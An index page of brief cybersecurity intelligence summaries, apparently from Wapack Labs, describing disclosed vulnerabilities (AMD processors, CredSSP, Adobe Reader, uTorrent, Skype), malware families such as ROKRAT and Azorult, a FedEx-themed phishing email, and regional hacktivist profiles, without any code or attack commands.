Intelligence Reporting

All Articles (100)

Security researchers have discovered 13 critical vulnerabilities, similar to Meltdown & Spectre, throughout AMD’s Ryzen and EPYC line of processors. These vulnerabilities could allow attackers to access to sensitive data, install backdoors/malware and gain full access to compromised systems.
Cybercriminals in the Middle East/North Africa (MENA) region are some of the most cooperative and united group of hackers in the world when their goal is to attack the West. Hacktivists collaborate for finanical and political gain, as well as for religious righteousness. Wapack Labs believe MENA bad actors will remain active and successful in various cyber campaigns against the West until the West attains a better understanding of the region’s language, culture, and religions.
Wapack Labs CTAC has exposed a large number of cyber events regarding the oil rich country of Kuwait and their oil and gas industry. Among targeted industries are a shipping company (merchantkuwait.com), which is a supplier for oil and gas, petrochemical, marine, and other industries (globalvision-kw.com), and a regional Kuwaiti construction company servicing oil, education and other sectors (cgc-kw.com). More incidents were discovered via CTAC are being further analyzed.
A Red Sky Alliance member reported a suspicious email to Wapack Labs for analysis. The suspicious email originated from sender: pvtromeo2007@aol.com. The subject of the email was Pvtromeo Notification N4821. The malicious email was posing as the FedEX company and attempting to get the user to click on a malicious link.
A critical vulnerability has been discovered in the Credential Security Support Provider protocol (CredSSP) that has affected all versions of Windows. CredSSP could allow remote attackers to exploit RDP and WinRM to steal data and run malicious code to take control of the target’s computer.
ROKRAT (also referred to as DOGcall) is a family of malware that has been used by attackers originating from North Korea.
A new Android malware, named “FakeApp”, has been discovered that steals Facebook credentials, account details, usernames / passwords and other information directly from victim devices. The malware is targeting mainly English-speaking users in Asian Pacific counties. The malware has originated through third-party app stores.
A critical vulnerability has been identified that allows attackers to execute remote code on target machines to take control of a victim’s computer. This vulnerability has been discovered in Adobe Acrobat Reader DC. It is a stack-based buffer overflow and allows execution of arbitrary code if a vulnerable document is opened.
A Google security researcher discovered a serious remote code execution vulnerability in both the μTorrent desktop app for Windows and the newly launched ‘μTorrent Web.’ This vulnerability allows users to download and stream torrents directly into their web browser.
Researchers have discovered a 0day vulnerability in Hewlett-Packard (HP) Project and Portfolio Management Center which could allow attackers to read sensitive files and data on the target system and also execute malicious input. These researchers found an XML entity injection vulnerability in the way HP PPM processed import tickets.
AutoSploit attempts to automate the exploitation of remote hosts. Targets are collected automatically by employing the Shodan.io API. The AutoSploit program allows a user to enter a targeted operating platform’s specific search query such as: Apache, IIS, etc, - upon which a list of candidates will be obtained. This exploit tool can be troublesome for networks that do not employ sound cyber security practices.
Bosnia and Herzegovina is a country in Southeastern Europe formerly under the Republic of Yugoslavia. After the dissolution of Yugoslavia, Bosnia and Herzegovina has experienced infighting of ethnically and religiously motivated hacktivist groups, as well as commercially motivated hackers. Current cyberlaws are not fully enacted, yet the country completely cooperates to fight cybercrime. Bosnian hackers use Bosnian, Serbian, German, English, and other languages to communicate. Due to recent…
A serious vulnerability has been identified in Skype that could allow attackers to gain full control of the target machine by granting system-level privileges to a local, unprivileged user.
On 08 February 2018, Wapack Labs discovered a user affected by the Azorult malware who may have compromised a major US city’s procurement portal. Analysts identified this infected user through our keylogger collection project. The affected user had their username and password stolen when signing onto the city’s procurement website portal. This city’s portal permits contractors to enter bids for the government’s request for quotes (RFQ).
A vulnerability in a piece of code titled gSOAP, also known as, “Devil’s Ivy,” is widely being exploited in physical security products. This could potentially allow attackers to fully disable or take over thousands of models of internet-connected devices, from security cameras to sensors and access-card readers.
In February 2018, Wapack Labs identified configurations for a Structured Query Language (SQL) injection tool showing attempted exploitation against the site for the 2018 Winter Olympic Games in PyeongChang, South Korea. A Wapack Labs Analyst identified the tool as SQLi Dumper. The developer, “c4rl0s” (for Carlos), states the SQL injection tool supports blind SQL injection, schema dumping, file dumping, MySQL brute forcing, site scanning, and can also hash online cracks. The attempted injection…
A new malware has been discovered targeting institutions in government, technology, education and telecommunications sectors in Asian counties and in the US. This malware performs various tasks, including password stealing, bitcoin mining, and providing hackers complete remote access to compromised systems.